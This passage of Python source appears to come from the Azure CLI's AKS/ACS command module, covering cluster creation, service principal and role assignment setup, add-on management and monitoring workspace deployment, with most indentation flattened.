Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
    Gets a random string of length n built from lowercase letters and digits
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
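# Illustrative sketch (hypothetical helper, placeholder secret and key material): the
# two mutually exclusive credential shapes _build_application_creds can return. Dates
# default to a one-year window starting now.
def _example_application_creds():
    password_creds, key_creds = _build_application_creds(password='placeholder-secret')
    assert password_creds is not None and key_creds is None
    password_creds, key_creds = _build_application_creds(key_value='placeholder-base64-cert')
    assert password_creds is None and key_creds is not None
    return password_creds, key_creds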
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
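# Illustrative sketch (hypothetical helper, placeholder subscription id): the scope
# strings _build_role_scope produces for its three input combinations.
def _example_build_role_scope():
    sub = '00000000-0000-0000-0000-000000000000'
    # no scope and no resource group -> whole subscription
    assert _build_role_scope(None, None, sub) == '/subscriptions/' + sub
    # resource group only -> scope narrowed to that group
    assert _build_role_scope('rg1', None, sub) == '/subscriptions/' + sub + '/resourceGroups/rg1'
    # an explicit scope is passed through untouched (combining it with a resource
    # group name raises CLIError instead)
    explicit = '/subscriptions/' + sub + '/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/vnet1'
    assert _build_role_scope(None, explicit, sub) == explicit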
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port)
_, browse_path = tempfile.mkstemp()
# TODO: need to add an --admin option?
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:9090".format(listen_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
# TODO: Better error handling here.
        requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
skip_subnet_role_assignment=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
max_pods=int(max_pods) if max_pods else None
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ContainerServiceServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]):
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=False if disable_rbac else True,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=mc)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
else:
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
instance.kubernetes_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run '
                                   '"az aks disable-addons -a monitoring" before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon == 'aciConnector' + os_type:
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
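# Illustrative sketch (hypothetical helper): the workspace-resource-id normalization
# that _update_addons performs inline above, and which reappears in _handle_addons_args
# and _ensure_container_insights_for_monitoring -- trim whitespace, prepend a leading
# '/' when missing, and drop any trailing '/'.
def _example_normalize_workspace_resource_id(workspace_resource_id):
    workspace_resource_id = workspace_resource_id.strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    return workspace_resource_id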
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
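# Illustrative sketch (hypothetical helper): the routing-only path through
# _handle_addons_args needs no workspace lookup, so it can be exercised without any
# Azure calls; cmd is unused on this path.
def _example_handle_addons_args(cmd=None):
    profiles = _handle_addons_args(cmd, 'http_application_routing',
                                   subscription_id=None, resource_group_name=None)
    assert profiles['httpApplicationRouting'].enabled is True
    return profiles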
def _install_dev_spaces_extension(extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureLocationToOmsRegionCodeMap = {
"eastus": "EUS",
"westeurope": "WEU",
"southeastasia": "SEA",
"australiasoutheast": "ASE",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"japaneast": "EJP",
"uksouth": "SUK",
"canadacentral": "CCA",
"centralindia": "CIN",
"eastus2euap": "EAP"
}
AzureRegionToOmsRegionMap = {
"australiaeast": "australiasoutheast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "eastus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "eastus",
"eastasia": "southeastasia",
"eastus": "eastus",
"eastus2": "eastus",
"japaneast": "japaneast",
"japanwest": "japaneast",
"northcentralus": "eastus",
"northeurope": "westeurope",
"southcentralus": "eastus",
"southeastasia": "southeastasia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westus": "eastus",
"westus2": "eastus",
"centralindia": "centralindia",
"southindia": "centralindia",
"westindia": "centralindia",
"koreacentral": "southeastasia",
"koreasouth": "southeastasia",
"francecentral": "westeurope",
"francesouth": "westeurope"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
default_region_name = "eastus"
default_region_code = "EUS"
    workspace_region = AzureRegionToOmsRegionMap.get(rg_location, default_region_name)
    workspace_region_code = AzureLocationToOmsRegionCodeMap.get(workspace_region, default_region_code)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
